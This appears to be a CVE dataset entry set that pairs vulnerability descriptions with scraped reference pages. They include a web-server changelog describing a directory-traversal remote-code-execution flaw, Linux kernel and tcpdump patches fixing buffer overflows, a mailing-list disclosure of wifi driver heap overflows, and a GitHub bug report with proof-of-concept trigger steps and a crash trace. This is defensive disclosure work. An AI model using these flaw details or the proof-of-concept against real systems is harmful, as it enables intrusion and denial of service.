Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request.

$nostromo: ChangeLog,v 1.241 2022/12/15 19:18:41 hacki Exp $ 2.1 === - Fix a vulnerability reported by Riccardo Krauter @ SoterITSecurity: If nostromo runs non-chrooted, and with the 'homedirs' configuration option enabled (disabled by default), an attacker can exploit a vulnerability to access files or execute programs (as CGI) outside of the server root directory. For that a specific request URL needs to be crafted by the attacker. 2.0 === - Fix compiling on NetBSD by suppressing the -Wall compiler option. Otherwise compiling breaks due to snprintf() truncate warnings. - Fix sizeof(http\_url) to sizeof(http\_urls) for the http\_urls buffer. Had no impact since both buffers anyway have the same size. - Replace SSL\_CTX\_use\_certificate\_file() with SSL\_CTX\_use\_certificate\_chain\_file(), so that the full certificate chain can be verified. - Update to libmy-2.1, which makes libbsd obsolete, and fixes compiling on FreeBSD. 1.9.9 ===== - Stupid me, forgot to bump the version in the last release! 1.9.8 ===== - Fix a potential segfault which can happen during nhttpd startup when reading a malformed comment line in the nhttpd.conf file. This was was caused by a buffer overflow in the libmy-1.8 fparse() function. Therefore upgraded to libmy-1.9 which contains a fix for fparse(). The issue was reported by Christoffer Jerkeby. 1.9.7 ===== - Fix for CVE-2019-16278 discovered by sp0re. Issue: Due to the missing accounting of the '\\r' character in the libmy-1.7 strcutl() function, an attacker can bypass the directory traversal check in the http\_verify() function in a non-chrooted nhttpd server and thus remote execute unauthorized code. Solution: Fix the strcutl() function in libmy-1.8 as described in the libmy ChangeLog: - strcutl(): take account of the '\\r' character when it appears within a string instead of ignoring it. Improved logic and performance diff by Adrian Steinmann Therefore the injected '\\r' characters will now generate an invalid path resulting in a HTTP 404 response. - Fix for CVE-2019-16279 discovered by sp0re. Issue: The missing header count functionality in the http\_header\_comp() function allowed an attacker to transmit more headers than accepted by nhttpd resulting in a buffer overflow in the header array leading to DoS. Solution: Add the missing header count functionality to the http\_header\_comp() function. Transmission of too many headers will now result in a HTTP 413 response as initially intended. - Close the connection after an HTTP 413 response as we are allowed according to RFC 2626 HTTP/1.1 10.4.14. 1.9.6 ===== - Restore original errno value after handling SIGCHLD. Otherwise this could lead to a break out of the main select(2) loop and therefore of unexpected termination of nostromo. Spotted by Adam Wozniak, nice catch! - Change the crypt(3) API, which is used for basic authentication, to accept all supported algorithms not just DES. - Check crypt(3) for returning NULL to prevent the nhttpd process to core dump in this case. - Add server cache for basic authentication credentials to speed up performance. This will save us filesystem access to htpasswd and additional password encryption cpu cycles for crypt(3). - Add MD5, Blowfish-a, and Blowfish-b algorithm to the crypt(1) tool. - Replace rand(3) with arc4random(3) in the crypt(1) tool for OpenBSD, NetBSD, and FreeBSD. - Fix broken BSD authentication method for basic authentication. - Fix several bites to make nostromo compile cleanly on the tested platforms again which are OpenBSD, NetBSD, FreeBSD, and Linux. - Rewrote printenv CGI from perl to shell script. - Add support for SIGHUP configuration reload. - Make a child process use the default signals instead inheriting the parent process signal handler. This fixes some odd issues. - Update copyright year to 2004 - 2016 and add nostromo CVS Id to all files. 1.9.5 ===== - Handle "Location:" field correctly when passed by a CGI. Bug reported by Axel Gonzalez. 1.9.4 ===== - Update copyright year to 2004 - 2011. - Make nostromo compile again by default; Remove -Werror in src/nhttpd makefiles and #include to src/nhttpd/main.c. - Fix a bug where when nostromo doesn't run in chroot mode somebody can access files beyond our htdocs environment by using specific encoded characters in the request URI (security issue). Issue found and reported by RedTeam Pentesting GmbH. - Fix a bug where in certain conditions garbage is written into the access\_log user agent field. - Do proper handling of max. file descriptors and allow to bump the select(2) max. file descriptors limit (FD\_SETSIZE) via the CON define in config.h by dynamically allocating the fd\_sets. 1.9.3 ===== - Fix two err(3) calls which are lacking an \`%s' modifier (security issue). Patch from Simon Kuhnle. - Fix wrong select() / send\_file() looping (resulting in high process load occasionally), by fixing bogus EAGAIN error handling in sys\_write\_a(). - Fix missing \`\`.Ed'' in nhttpd.8 man page. 1.9.2 ===== - Fix a bug where a 403 response is returned instead of a 404 response. Patch from Szabolcs Nagy. - Style diff which fixes spacing from Daniel Ouellet. - Add optional \`\`homedirs\_public'' configuration parameter to restrict access within the home directories. Suggested by Simon Kuhnle. - Add mandatory \`\`serverlisten'' configuration parameter to allow specific interface binding. - Replaced libmy with latest version libmy-1.7. 1.9.1 ===== - Replace off\_t with intmax\_t integer type since problems have been reported with compiling on some 64bit Linux systems. Therefore we remove the GNU compiler option '-D\_FILE\_OFFSET\_BITS=64'. Initial diff received from Kurt Roeckx. - For unused, string based configuration options, use '\\0' instead strlcpy() '0' into the array. It's less disturbing and more straight. Diff received from Szabolcs Nagy. - Don't leave some alias specific buffers uninitialized, because it can happen that we access those later. Bug reported by Szabolcs Nagy. - According to RFC 3875 set the SERVER\_NAME environment variable dynamicly dependend on the "Host:" request header field instead setting it staticly to the configured servername. Bug reported by Szabolcs Nagy. - Fix a bug where a CGI "Status:" request for 403 or 404 caused a corrupt response header. Bug reported by Szabolcs Nagy. - The header field "Host:" is mandatory for HTTP/1.1 client requests. If it doesn't exist return 400 Bad Request instead of further processing the request. Bug reported by Szabolcs Nagy. - Drop MacOSX support. Too many tweaks with recent MacOSX versions for compiling. - Update copyright year to 2004 - 2009. - Fix sys\_log() by replacing syslog() with vsyslog() so the string arguments get passed. While here move from LOG\_DEBUG to LOG\_INFO. - Replaced libmy with latest version libmy-1.6. 1.9 === - Replace server log parameter entries in the man page by syslog(3). 1.8.9 ===== - send all server log messages to syslog(3) instead to our own log file The configuration parameter "logserver" is obsolete therefore and has been removed from nhttpd.conf. Suggested by Matthias-Christian Ott - Make "logpid" and "logaccess" configuration parameters optional, which allows it to disable pid and access log creation. Suggested by Matthias-Christian Ott. - Remove the whole BSD authentication code on non-OpenBSD systems. Diff received from Matthias-Christian Ott. 1.8.8 ===== - Fix a bug where a requested file with size 0 caused us to send an HTTP repsonse in a loop. Bug reported by Kai Hendry. - Fix a bug where a directory request without trailing "/" to a virtual host URL returned a wrong 301-Location field value. Bug reported by Kai Hendry. - Change mime types parsing to the default syntax; extensions are separated by spaces instead by commas. Our default mime types file (conf/mimes) has been changed to the new syntax therefore. - Also check if HTTPS requests do match to our default URL before searching for virtual hosts. 1.8.7 ===== - Fix security issue for none chroot environments reported by Ben Hutchings: Disallow any direct access to upper level directories (..). On occurrence of a "/../" string in the request URI we return 400 Bad Request now. This prevents access to files beyond of the serverroot directory. - Fix a bug reported by Szabolcs Nagy: If a CGI option ends with a "/" don't apply the docindex to it. - If the PID file can't be created also report about the full filename in the error log. Requested by Kai Hendry. 1.8.6 ===== - Handle POST requests with content length 0 correctly, diff received from Georg Wendenburg. 1.8.5 ===== - Added support for SSLv3. - Replaced a strlcpy() with memcpy() because at this point binary data could be involved. Pointed out by Georg Wendenburg. - Added CONTENT\_TYPE CGI env, diff received from Georg Wendenburg. - Quiet down error messages in the server log file by moving some common error messages to the debug mode output. 1.8.4 ===== - If a select(2) error in the main loop is not EINTR, we shutdown the server. EFAULT, EBADF, and EINVAL are not acceptable. - When a connection gets closed FD\_CLR() the write set also in either case. this fix should finally let get us rid from the select(2) EBADF error, and overwrites the EBADF workaround fix from version 1.8.3. 1.8.3 ===== - Fix a Linux tweak with off\_t by adding -D\_FILE\_OFFSET\_BITS=64 to the compiler options. - If a select(2) error in the main loop is not EINTR, close the connection. this avoids endless looping e.g. when EBADF occurs. - Typo corrections for nhttpd.conf-dist and nhttpd.8 from Will Maier. 1.8.2 ===== - Fix wrong version numbers. 1.8.1 ===== - Fixed gcc3 tweak with variable array definition which caused compiliation error on gcc2 platforms. - Replaced libmy with latest version libmy-1.5. 1.8 === - Added homedirs support. - Added basic authentication via BSD authentication. - Moved variable type for filesizes from int to off\_t to enable proper transfers of very large files. - Directory listing files are sorted alphabetical now. - Make our HTML output HTML 4.01 transitional. - Fixed man page typos. 1.7.9 ===== - The rewritten http\_header\_comp() function implemented in version 1.7.7 could lead to a buffer overflow in some circumstances because the arrived header sequence was not checked for its minimum size. On my machines this effect ended up in a immediately process termination. Nasty bug fixed now. While we are at this function we also get rid of strlen() because we already have the current header size saved in our connection structure; safer and faster. - Fixed man page typos. 1.7.8 ===== - CGIs are no longer determined by a CGI alias. nhttpd checks now if a file has the world executable flag set, and if yes the file is handled as a CGI. this allows you to place CGIs anywhere in your document root, and also to use CGIs as index. the cgiroot and cgiindex config options are obsolete therefore and where removed from the configfile. cgi-bin has moved to htdocs/cgi-bin - Use stat(2) S\_IROTH instead of access(2) to check for file permissions, as we have that information already. - Added HTTP\_ACCEPT\_ENCODING CGI env - Simplified debug logging. - Fixed broken permissions checking on directories. - Fixed another binary data handling issue in CGI main loop. - Improved error handling for select(2) in CGI main loop. - On a fatal error at CGI execution send a 500 before exit(3). - Extended man page. 1.7.7 ===== - http\_header\_comp() which checks if a complete header sequence arrived got unreliable because of our new asynchronous connection handling since version 1.7.6. The function is fixed now and as a side effect much more simplified using less resources. 1.7.6 ===== - Rewrote nostromo to handle connections fully asynchronous over one single select(2) now. This change also fixes the problem that slow connections walked into a connection timeout. - The socket send buffer size is now kept to the operating system value by default. It can be changed optional in config.h by the SBS define. - Added debug mode option. - Added IF\_MODIFIED\_SINCE CGI env, diff received from Daniel Hartmeier. - Fixed unterminated childs leftover when parent is killed. - Fixed broken pipeline connection handling. - Fixed http\_chunk() to handle also binary data now. - Fixed double printing of server port in the signature. - Fixed double creation of Location header field for CGIs. - Fixed wrong Location string for 301 responses over SSL non-default port. - Fixed access log variable which could be used uninitialized. - Fixed broken custom responses. on large custom response files, the transfer was aborted. - Disabled chunking for HTTP/1.0 clients. - Disabled case sensitivy for HTTP protocol. - Reorderd configuration file. - Removed a unnecessary getpid(2) when daemonizing. - Replaced signal handlers SIGTERM code with a volatile sig\_atomic\_t flag. - Extended man page. - Improved style / KNF. 1.7.5 ===== - Set SO\_SNDBUF size on accepted client socket, not on the listener socket, because not every tcp/ip implementation supports inheritance. - Set sockets to O\_NONBLOCK to prevent any possible blocks. 1.7.4 ===== - Fixed POST content size limitation of 8KB. POST content can now be unlimited and is handled in the forked CGI process itself. - Removed all setenv(3) and unsetenv(3) functions and set CGI environment vars with execve(2) instead. This has increased the CGI serving performance about the factor 8. - The DOCUMENT\_ROOT CGI environment variable was set wrong in some cases. Bug fixed now. - In some cases the GMT offset was wrong calculated in the access log. Bug fixed now 1.7.3 ===== - Optimized performance and memory usage by source code optimization. - If a CGI post body included binary data the processing was aborted because we could not handle the binary part. Bug fixed now. - If a CGI post body was terminated with '\\r\\n' and some browsers count that to its content length (and some do not, what a mess!) the post was ignored. Bug fixed now - If the defined setuid user was not found, output a custom error instead the getpwnam(3) errno which almost says nothing. - Removed -ansi compile option to follow OpenBSD. - Fixed -pedantic compile option source code quirks. - Replaced libmy with latest version libmy-1.4. - Changed logo URL. - Applied typo diff for man page received from Marc Balmer@. 1.7.2 ===== - Added custom 401, 403, and 404 responses, requested by Marc Winiger. - Added nph CGI support. - Close all file descriptors which do not belong to the child after fork(2). - Replaced recv(2) with read(2) as we do not use flags. - Replaced send(2) with write(2) as we do not use flags. - Check more system calls for EINTR. - If a CGI post body was terminated with '\\r\\n', we did not parsed that and the post was ignored. Bug fixed now. - In some cases we had wrong data transmission because write(2) was not checked for short writes. Bug fixed now. - Fixed SSL memory leak. 1.7.1 ===== - Implemented HEAD method. - If on basic authentication the realm option in a htaccess file could not be parsed, we just kept the last value in the realm variable instead of overwriting it with "unknown realm". Bug fixed now. 1.7 === - Added 206 Partial Content. Forced by Delta. - Added example lines to configuration file how to change default port 80. - Excluded sin6\_len for Linux. - Imported new nostromo logo. - It is possible now to run IPv6 only. - Deny to run nhttpd as root. - Improved SSL handshake. - Main select(2) checks now writefds to cleanly serve partial file sends - Fixed typos and reviewed source code for BSD style. - If 301 Moved Permanently was called with https, we switched back to http because we did not check for the https flag. Bug fixed now. 1.6 === - Added IPv6 support. - Added pid file creation. - Set listener sockets to SO\_REUSEADDR. - Moved a bunch of static environment variables to dynamic ones, because of SSL and IPv6 introduction. - CGI https environment variable was set wrong because asking the wrong ssl flag variable. Bug fixed now. - If running in chroot mode, virtual hosts and aliases where not found because we accessed the full path to the config file. Bug fixed now. - If returning 500 on file send errors, open files where not closed. Bug fixed now. 1.5.1 ===== - chroot mode caused process hang if /dev/null where not found in the chroot environment. Bug fixed now. 1.5 === - Added SSL support. - Added 403 Forbidden, what means that files are checked for read permissions now instead returning 500 Internal Server Error if no access. - Added TODO file. - Corrected and extended man page. - If the content type was unknown the previous content type was sent, which is wrong. Now the html content type will be send per default on unknown content types. - select(2) for header and body read where using the same readset as the master select(2) which is wrong. Using now own readset. 1.4 === - Corrected the man page. - One of three access\_log functions was still logging with two lines per hit. Bug fixed now. 1.3 === - Makefiles have been ported to compile also on NetBSD, FreeBSD, Linux and MacOSX. - Reduced access\_log to one line per hit instead of two. - Filenames including spaces in directory listing wasn't found, because the href entry had no quotes. Bug fixed now. 1.2 === - If a CGI was called which didn't exist, the last called CGI was executed because the responsible variable, which holds the full executable path, wasn't overwritten. bug fixed now. - Replaced libmy with latest version libmy-1.3 (fixes important security issues). - Replaced last strcpy(3) with strlcpy(3). 1.1 === - Increased socket send buffer to avoid send(2) blocking when buffer is full. - In server log removed unnecessary log messages, made the existing ones more specific and added new log messages. - Removed pre-compiler debug informations because they made the source code hard to read and where not really usable in action. 1.0 === - Fixed memory leak. 0.9 === - A wrong if-condition caused the nhttpd parent process to exit(0) if a CGI was called which didn't exist. Bug fixed now. 0.8 === - Nostromo has been rewritten from a fork(2) server to a select(2) server. with this new method no more child forking for file requests is necessary and the server performance increases therefore. - Increased performance by optimizing source code. - Replaced libmy with latest version libmy-1.2 (faster). - Added pre-compiler debug option to config.h. 0.7 === - Sometimes a child process still hung because not all recv(2) was checked for connection timeout. placed select(2) in front of all recv(2) to check timeout. - Fixed wrong version numbering at several places. - Added install script (Install). 0.6 === - Sometimes a child process hung because of blocking recv(2). bug fixed now. - Replaced libmy with latest version libmy-1.1. - Added timestamps to server log file. - Added version option. 0.5 === - nhttpd didn't chroot(2) because chroot(2) where placed before all configuration files could be read. bug fixed now. 0.4 === - libmy had missing #include in flog.c, nsend.c, strlower.c some architectures (e.g. sparc64) complained and stopped at compiling. bug fixed now. 0.3 === - nhttpd didn't handle http control characters (\\r\\n\\r\\n) in POSTs body entity, and blocked at recv(2). bug fixed now. 0.2 === - Changed default configfile path to /var/nostromo/conf/nhttpd.conf. - chdir/chroot will directly done after reading the configfile successfully. - SIGPIPE, SIGHUP, SIGQUIT, SIGALRM will be silently ignored now and don't generate a server log anymore. 0.1 === - Initial version.

CVE-2019-16278

In the Linux kernel through 5.3.2, cfg80211_mgd_wext_giwessid in net/wireless/wext-sme.c does not reject a long SSID IE, leading to a Buffer Overflow.

**\[prev in list\] \[next in list\] \[prev in thread\] \[next in thread\]** 
**List:       linux-wireless
Subject:    \[PATCH 2/2\] cfg80211: wext: Reject malformed SSID elements
From:       Will Deacon <will () kernel ! org>
Date:       2019-10-04 9:51:32
Message-ID: 20191004095132.15777-2-will () kernel ! org
\[Download RAW message or body\]**

Ensure the SSID element is bounds-checked prior to invoking memcpy()
with its length field.

Cc: <stable@vger.kernel.org>
Cc: Johannes Berg <johannes@sipsolutions.net>
Cc: Kees Cook <keescook@chromium.org>
Reported-by: Nicolas Waisman <nico@semmle.com>
Signed-off-by: Will Deacon <will@kernel.org>
---
 net/wireless/wext-sme.c | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/net/wireless/wext-sme.c b/net/wireless/wext-sme.c
index c67d7a82ab13..3fd2cc7fc36a 100644
--- a/net/wireless/wext-sme.c
+++ b/net/wireless/wext-sme.c
@@ -201,6 +201,7 @@ int cfg80211\_mgd\_wext\_giwessid(struct net\_device \*dev,
 			       struct iw\_request\_info \*info,
 			       struct iw\_point \*data, char \*ssid)
 {
+	int ret = 0;
 	struct wireless\_dev \*wdev = dev->ieee80211\_ptr;
 
 	/\* call only for station! \*/
@@ -219,7 +220,10 @@ int cfg80211\_mgd\_wext\_giwessid(struct net\_device \*dev,
 		if (ie) {
 			data->flags = 1;
 			data->length = ie\[1\];
-			memcpy(ssid, ie + 2, data->length);
+			if (data->length > IW\_ESSID\_MAX\_SIZE)
+				ret = -EINVAL;
+			else
+				memcpy(ssid, ie + 2, data->length);
 		}
 		rcu\_read\_unlock();
 	} else if (wdev->wext.connect.ssid && wdev->wext.connect.ssid\_len) {
@@ -229,7 +233,7 @@ int cfg80211\_mgd\_wext\_giwessid(struct net\_device \*dev,
 	}
 	wdev\_unlock(wdev);
 
-	return 0;
+	return ret;
 }
 
 int cfg80211\_mgd\_wext\_siwap(struct net\_device \*dev,
-- 
2.23.0.581.g78d2f28ef7-goog

**\[prev in list\] \[next in list\] \[prev in thread\] \[next in thread\]** 

  

Configure | About | News | Add a list | Sponsored by KoreLogic

CVE-2019-17133: '[PATCH 2/2] cfg80211: wext: Reject malformed SSID elements'

The command-line argument parser in tcpdump before 4.9.3 has a buffer overflow in tcpdump.c:get_next_file().

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

(for 4.9.3) CVE-2018-14879/fix -V to fail invalid input safely

get\_next\_file() did not check the return value of strlen() and
underflowed an array index if the line read by fgets() from the file
started with \\0. This caused an out-of-bounds read and could cause a
write. Add the missing check.

This vulnerability was discovered by Brian Carpenter & Geeknik Labs.

*   Loading branch information

Showing **1 changed file** with **4 additions** and **2 deletions**.

6 changes: 4 additions & 2 deletions tcpdump.c

Expand Up

@@ -699,13 +699,15 @@ static char \*

get\_next\_file(FILE \*VFile, char \*ptr)

{

char \*ret;

size\_t len;

  

ret \= fgets(ptr, PATH\_MAX, VFile);

if (!ret)

return NULL;

  

if (ptr\[strlen(ptr) \- 1\] \== '\\n')

ptr\[strlen(ptr) \- 1\] \= '\\0';

len \= strlen (ptr);

if (len \> 0 && ptr\[len \- 1\] \== '\\n')

ptr\[len \- 1\] \= '\\0';

  

return ret;

}

Expand Down

**0 comments on commit 9ba9138**

Please sign in to comment.

CVE-2018-14879: (for 4.9.3) CVE-2018-14879/fix -V to fail invalid input safely · the-tcpdump-group/tcpdump@9ba9138

An issue was discovered in net/wireless/nl80211.c in the Linux kernel through 5.2.17. It does not check the length of variable elements in a beacon head, leading to a buffer overflow.

**\[prev in list\] \[next in list\] \[prev in thread\] \[next in thread\]** 
**List:       linux-wireless
Subject:    \[PATCH 1/2\] nl80211: validate beacon head
From:       Johannes Berg <johannes () sipsolutions ! net>
Date:       2019-09-20 19:54:17
Message-ID: 1569009255-I7ac7fbe9436e9d8733439eab8acbbd35e55c74ef () changeid
\[Download RAW message or body\]**

From: Johannes Berg <johannes.berg@intel.com>

We currently don't validate the beacon head, i.e. the header,
fixed part and elements that are to go in front of the TIM
element. This means that the variable elements there can be
malformed, e.g. have a length exceeding the buffer size, but
most downstream code from this assumes that this has already
been checked.

Add the necessary checks to the netlink policy.

Cc: stable@vger.kernel.org
Fixes: ed1b6cc7f80f ("cfg80211/nl80211: add beacon settings")
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
---
 net/wireless/nl80211.c | 37 +++++++++++++++++++++++++++++++++++--
 1 file changed, 35 insertions(+), 2 deletions(-)

diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
index fd05ae1437a9..932854a0c38b 100644
--- a/net/wireless/nl80211.c
+++ b/net/wireless/nl80211.c
@@ -201,6 +201,38 @@ cfg80211\_get\_dev\_from\_info(struct net \*netns, struct genl\_info \*info)
 	return \_\_cfg80211\_rdev\_from\_attrs(netns, info->attrs);
 }
 
+static int validate\_beacon\_head(const struct nlattr \*attr,
+				struct netlink\_ext\_ack \*extack)
+{
+	const u8 \*data = nla\_data(attr);
+	unsigned int len = nla\_len(attr);
+	const struct element \*elem;
+	const struct ieee80211\_mgmt \*mgmt = (void \*)data;
+	unsigned int fixedlen = offsetof(struct ieee80211\_mgmt,
+					 u.beacon.variable);
+
+	if (len < fixedlen)
+		goto err;
+
+	if (ieee80211\_hdrlen(mgmt->frame\_control) !=
+	    offsetof(struct ieee80211\_mgmt, u.beacon))
+		goto err;
+
+	data += fixedlen;
+	len -= fixedlen;
+
+	for\_each\_element(elem, data, len) {
+		/\* nothing \*/
+	}
+
+	if (for\_each\_element\_completed(elem, data, len))
+		return 0;
+
+err:
+	NL\_SET\_ERR\_MSG\_ATTR(extack, attr, "malformed beacon head");
+	return -EINVAL;
+}
+
 static int validate\_ie\_attr(const struct nlattr \*attr,
 			    struct netlink\_ext\_ack \*extack)
 {
@@ -322,8 +354,9 @@ const struct nla\_policy nl80211\_policy\[NUM\_NL80211\_ATTR\] = {
 
 	\[NL80211\_ATTR\_BEACON\_INTERVAL\] = { .type = NLA\_U32 },
 	\[NL80211\_ATTR\_DTIM\_PERIOD\] = { .type = NLA\_U32 },
-	\[NL80211\_ATTR\_BEACON\_HEAD\] = { .type = NLA\_BINARY,
-				       .len = IEEE80211\_MAX\_DATA\_LEN },
+	\[NL80211\_ATTR\_BEACON\_HEAD\] =
+		NLA\_POLICY\_VALIDATE\_FN(NLA\_BINARY, validate\_beacon\_head,
+				       IEEE80211\_MAX\_DATA\_LEN),
 	\[NL80211\_ATTR\_BEACON\_TAIL\] =
 		NLA\_POLICY\_VALIDATE\_FN(NLA\_BINARY, validate\_ie\_attr,
 				       IEEE80211\_MAX\_DATA\_LEN),
-- 
2.20.1

**\[prev in list\] \[next in list\] \[prev in thread\] \[next in thread\]** 

  

Configure | About | News | Add a list | Sponsored by KoreLogic

CVE-2019-16746: '[PATCH 1/2] nl80211: validate beacon head'

There is heap-based buffer overflow in Linux kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code.

'CVE-2019-14814?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2019-14814: Invalid Bug ID

There is heap-based buffer overflow in kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 28 Aug 2019 13:50:53 +0800
From: huangwen <huangwenabc@...il.com>
To: oss-security@...ts.openwall.com
Subject: Linux kernel: three heap overflow in the marvell wifi driver

Hi,

There are three heap-based buffer overflows in marvell wifi chip driver in
Linux kernel, allow local users to cause a denial

of service(system crash) or possibly execute arbitrary code.The bugs can be
triggered by sending crafted  packet via netlink.


Description

==========

\[1\]CVE-2019-14814:Heap Overflow in mwifiex\_set\_uap\_rates() function of
Marvell Wifi Driver in Linux kernel


The problem is inside mwifiex\_set\_uap\_rates() in
drivers/net/wireless/marvell/mwifiex/uap\_cmd.c.
There are two memcpy calls in this function to copy WLAN\_EID\_SUPP\_RATES
element and WLAN\_EID\_EXT\_SUPP\_RATES element

without checking length. The dst buffer bss\_cfg->rates is a array of length
MWIFIEX\_SUPPORTED\_RATES(14). The two elements in

cfg80211\_ap\_settings are from user space.



\[2\]CVE-2019-14815: Heap Overflow in mwifiex\_set\_wmm\_params() function of
Marvell Wifi Driver in Linux kernel


The problem is inside mwifiex\_set\_wmm\_params() in
drivers/net/wireless/marvell/mwifiex/uap\_cmd.c.
mwifiex\_set\_wmm\_params() calls memcpy to copy WLAN\_OUI\_MICROSOFT element to
bss\_cfg->wmm\_info without checking  length.

bss\_cfg->wmm\_info is struct mwifiex\_types\_wmm\_info type with fixed len 24.



\[3\]CVE-2019-14816:Heap Overflow in mwifiex\_update\_vs\_ie() function of
Marvell Wifi Driver in Linux kernel



The problem is inside mwifiex\_update\_vs\_ie() in
drivers/net/wireless/marvell/mwifiex/ie.c.

mwifiex\_set\_mgmt\_beacon\_data\_ies()  parses beacon IEs, probe response IEs,
association response IEs from cfg80211\_ap\_settings->beacon,

will call mwifiex\_update\_vs\_ie() twice for each IEs if there exists IEs.
For beacon\_ies as example, on the first call, mwifiex\_update\_vs\_ie() alloc

memory ie and then copy WLAN\_OUI\_MICROSOFT element to ie->ie\_buffer,
ie->ie\_buffer
is a array of length IEEE\_MAX\_IE\_SIZE(256); on the

Second call, mwifiex\_update\_vs\_ie() copy WLAN\_OUI\_WFA elment to
previous allocated
ie->ie\_buffer. If sum of  length of the two elements is

greater than IEEE\_MAX\_IE\_SIZE, will cause buffer overflow.



Patch

=====

https://lore.kernel.org/linux-wireless/20190828020751.13625-1-huangwenabc@gmail.com/

Credit

==========

This issue was discovered by huangwen of ADLab of Venustech

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2019-14816: security - Linux kernel: three heap overflow in the marvell wifi driver

A buffer overflow flaw was found, in versions from 2.6.34 to 5.2.x, in the way Linux kernel's vhost functionality that translates virtqueue buffers to IOVs, logged the buffer descriptors during migration. A privileged guest user able to pass descriptors with invalid length to the host when migration is underway, could use this flaw to increase their privileges on the host.

'CVE-2019-14835?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2019-14835: Invalid Bug ID

process_http_response in OpenConnect before 8.05 has a Buffer Overflow when a malicious server uses HTTP chunked encoding with crafted chunk sizes.

CVE-2019-16239

ffjpeg before 2019-08-21 has a heap-based buffer overflow in jfif_load() at jfif.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

Marsman1996 opened this issue

Aug 18, 2019

· 10 comments

**Comments**

**Test Environment**

Ubuntu 14.04, 64bit, ffjpeg(master 627c8a9)

**How to trigger**

1.  compile ffjpeg with cmake file from CMake Support && FPE on unknown address #6
2.  $ ./ffjpeg -d $POC

**POC file**

https://github.com/Marsman1996/pocs/blob/master/ffjpeg/poc22-jfif\_load-heapoverflow

**Details****Asan report**

    =================================================================
    ==17308== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60340000fef8 at pc 0x402fec bp 0x7ffc051db980 sp 0x7ffc051db978
    WRITE of size 4 at 0x60340000fef8 thread T0
        #0 0x402feb in jfif_load /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/jfif.c:187
        #1 0x401a59 in main /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/ffjpeg.c:24
        #2 0x7f5291e9bf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
        #3 0x401858 in _start (/home/aota10/MARS_fuzzcompare/test/ffjpeg/bin_asan/bin/ffjpeg+0x401858)
    0x60340000fef8 is located 0 bytes to the right of 504-byte region [0x60340000fd00,0x60340000fef8)
    allocated by thread T0 here:
        #0 0x7f52922584e5 (/usr/lib/x86_64-linux-gnu/libasan.so.0+0x154e5)
        #1 0x40293b in jfif_load /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/jfif.c:154
        #2 0x401a59 in main /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/ffjpeg.c:24
        #3 0x7f5291e9bf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/jfif.c:187 jfif_load
    Shadow bytes around the buggy address:
      0x0c06ffff9f80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffff9f90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffff9fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c06ffff9fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c06ffff9fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c06ffff9fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]
      0x0c06ffff9fe0:fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffff9ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffffa000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffffa010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c06ffffa020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:     fa
      Heap righ redzone:     fb
      Freed Heap region:     fd
      Stack left redzone:    f1
      Stack mid redzone:     f2
      Stack right redzone:   f3
      Stack partial redzone: f4
      Stack after return:    f5
      Stack use after scope: f8
      Global redzone:        f9
      Global init order:     f6
